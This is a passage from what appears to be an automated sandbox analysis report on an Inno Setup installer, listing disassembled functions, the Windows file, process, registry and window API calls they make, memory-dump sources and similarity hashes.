                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
                                                            • Instruction ID: f6f51fa323c2004b4ed4a12cf3aa4c02228d8e81e9c13bd86265522dc6499af0
                                                            • Opcode Fuzzy Hash: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
                                                            • Instruction Fuzzy Hash: B01172A160425956FF706A7A6F09BEA3F9C7FD1745F050429BE419B283CB38CC458BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00423A20, Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                            • GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                            • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A70
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                            • String ID:
                                                            • API String ID: 2814369299-0
                                                            • Opcode ID: 5cf6f583151de2db28f1a3568ac7f7c21abc363b183444b2113c2190a0e75535
                                                            • Instruction ID: b6ddb16581f5c3c7179c90d7d3f79c6d55466118c1baf1b24a27a0798ed1e7de
                                                            • Opcode Fuzzy Hash: 5cf6f583151de2db28f1a3568ac7f7c21abc363b183444b2113c2190a0e75535
                                                            • Instruction Fuzzy Hash: FAF0A7613803241999203DBE28C9ABF115CC9427AFB54077FF994D22D2D62D5F87415D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005B631C, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • UnhookWindowsHookEx.USER32(00000000), ref: 005B632E
                                                            • SetEvent.KERNEL32(00000000), ref: 005B635A
                                                            • GetCurrentThreadId.KERNEL32 ref: 005B635F
                                                            • MsgWaitForMultipleObjects.USER32 ref: 005B6388
                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 005B6395
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                            • String ID:
                                                            • API String ID: 2132507429-0
                                                            • Opcode ID: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                            • Instruction ID: 777aa0f60006170efd8bf97b8faec0e2cbbea874aebe53a0ac6f8c30ff2fdbbe
                                                            • Opcode Fuzzy Hash: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                            • Instruction Fuzzy Hash: 30018B70A09700EED700EB65DC45BAE37E9FB44715F604A2AF055C75D0DB38A480CB42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B8F64, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE,?,?), ref: 006B8FD4
                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE), ref: 006B8FFD
                                                            • MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000), ref: 006B9016
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: File$Attributes$Move
                                                            • String ID: isRS-%.3u.tmp
                                                            • API String ID: 3839737484-3657609586
                                                            • Opcode ID: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
                                                            • Instruction ID: 31d351f3c97924346b89867796ea0414510024315a00da88274a448b23120628
                                                            • Opcode Fuzzy Hash: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
                                                            • Instruction Fuzzy Hash: AB318170D04218ABCB00EBB9C8859EEB7B9EF48314F51467EF814B7281D7385E818769
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060C038, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNEL32 ref: 0060C08C
                                                            • GetLastError.KERNEL32(00000000,00000000,006D579C,?,?,XMb,00000000,>Mb,?,00000000,00000000,0060C0B2,?,?,00000000,00000001), ref: 0060C094
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateErrorLastProcess
                                                            • String ID: >Mb$XMb
                                                            • API String ID: 2919029540-2660256435
                                                            • Opcode ID: cc071ed51034117dff2eb24da789fdfe7696ce97c15fb88c7d50c2d671ecce20
                                                            • Instruction ID: 6fed8a1d79b3fe7fb7c31d778b9d5703ccb9eb2a1393ada51090ba1ca1dee2d9
                                                            • Opcode Fuzzy Hash: cc071ed51034117dff2eb24da789fdfe7696ce97c15fb88c7d50c2d671ecce20
                                                            • Instruction Fuzzy Hash: DA113972640208AFCB54DFA9DC81DDFB7ECEB4D320B518666F908D3280D635AE108BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B6998, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNEL32 ref: 006B6A05
                                                            • CloseHandle.KERNEL32(006B6AB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,006B6A6C,?,006B6A5C,00000000), ref: 006B6A22
                                                              • Part of subcall function 006B68EC: GetLastError.KERNEL32(00000000,006B6989,?,?,?), ref: 006B690F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                            • String ID: (\m$D
                                                            • API String ID: 3798668922-1981685662
                                                            • Opcode ID: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                            • Instruction ID: 5a29f4a3f67f8962990b16f59edcecd6c92ec2fdb2b6e45770094aa6b13b7383
                                                            • Opcode Fuzzy Hash: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                            • Instruction Fuzzy Hash: 53115EB1604248AFDB00EBA5CC92EEE77ADEF08704F51407AF505F7281E678AE448768
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0062460C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005C52C8: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,006D579C,00000000,0060D8F7,00000000,0060DBD2,?,?,006D579C), ref: 005C52F9
                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062464F
                                                            • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 0062466B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Type$FullLoadNamePathRegister
                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                            • API String ID: 4170313675-2435364021
                                                            • Opcode ID: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                            • Instruction ID: a0643c8b31b351ed7dd0ed5e96a0399ab73b0cd2583ebe073036f576505b33dd
                                                            • Opcode Fuzzy Hash: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                            • Instruction Fuzzy Hash: 2D0148317407146BDB10EBB6DC82F8E77EDDB49704F514876B400F62D2DE78AE058A58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060DAE9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0060DAF4
                                                              • Part of subcall function 00423A20: DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                              • Part of subcall function 00423A20: GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                              • Part of subcall function 00423A20: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                              • Part of subcall function 00423A20: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 0060DB21
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
                                                            • String ID: DeleteFile$MoveFile
                                                            • API String ID: 3947864702-139070271
                                                            • Opcode ID: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
                                                            • Instruction ID: fe212bc12655be3e3d7d94ed230904773b29f806c55adb2c37bf9887ca86c235
                                                            • Opcode Fuzzy Hash: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
                                                            • Instruction Fuzzy Hash: 62F044706841058AEB08FBF6E9069AF73A5EF44318F51467EF404E72C1DA3C9C05862D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004698FC, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 0046998A
                                                              • Part of subcall function 004236A4: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,00443D4C,004699CC,00000000,00469A4C,?,?,00443D4C), ref: 004236F3
                                                              • Part of subcall function 00423BD0: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,00443D4C,004699E7,00000000,00469A4C,?,?,00443D4C,00000001), ref: 00423BF3
                                                            • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 004699F1
                                                              • Part of subcall function 00427D54: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427D78
                                                              • Part of subcall function 00427D54: LocalFree.KERNEL32(00000001,00427DD1,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                                                            • String ID: \UA$dUA
                                                            • API String ID: 503893064-3864016770
                                                            • Opcode ID: 8f6538f2233dbe51c704c46e78bae72522b5131ed1e615a9c685bbd8288b59b5
                                                            • Instruction ID: 123e0454fb2a9dec89cd9e8203dbd653fcf04e778e7e37e714b9737e464d7bf3
                                                            • Opcode Fuzzy Hash: 8f6538f2233dbe51c704c46e78bae72522b5131ed1e615a9c685bbd8288b59b5
                                                            • Instruction Fuzzy Hash: 8641A370B002599FDB00EFA6C8815EEBBF5AF58314F40812AE914A7382D77D5E05CB6A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040DE74, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040DE85
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040DEE3
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040DF40
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040DF73
                                                              • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040DEF1), ref: 0040DE47
                                                              • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040DEF1), ref: 0040DE64
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Thread$LanguagesPreferred$Language
                                                            • String ID:
                                                            • API String ID: 2255706666-0
                                                            • Opcode ID: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                            • Instruction ID: 69b1dabfcf83cd92044bbbe7d095353c7cd2b80021ffbfb9d1b785f1729ac455
                                                            • Opcode Fuzzy Hash: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                            • Instruction Fuzzy Hash: 63317070E1021A9BCB10DFE9D884AAEB7B5FF14305F40417AE516FB2D1D7789A09CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005B9590, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindowVisible.USER32 ref: 005B95A3
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 005B95E5
                                                            • SetWindowLongW.USER32 ref: 005B95FF
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005B96B9,?,?,?,00000000), ref: 005B9627
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$Long$Visible
                                                            • String ID:
                                                            • API String ID: 2967648141-0
                                                            • Opcode ID: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
                                                            • Instruction ID: de5a40ccb5800a4cef2b87037ee72a09c9fd5293aebedbf233be07227e7c069f
                                                            • Opcode Fuzzy Hash: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
                                                            • Instruction Fuzzy Hash: B31161742851446FDB00DB28D888FFA7FE9AB45324F458191F988CB362CA38ED80CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0046A218, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindResourceW.KERNEL32(?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?,?,006AC890), ref: 0046A22F
                                                            • LoadResource.KERNEL32(?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?), ref: 0046A249
                                                            • SizeofResource.KERNEL32(?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000), ref: 0046A263
                                                            • LockResource.KERNEL32(00469B00,00000000,?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000), ref: 0046A26D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
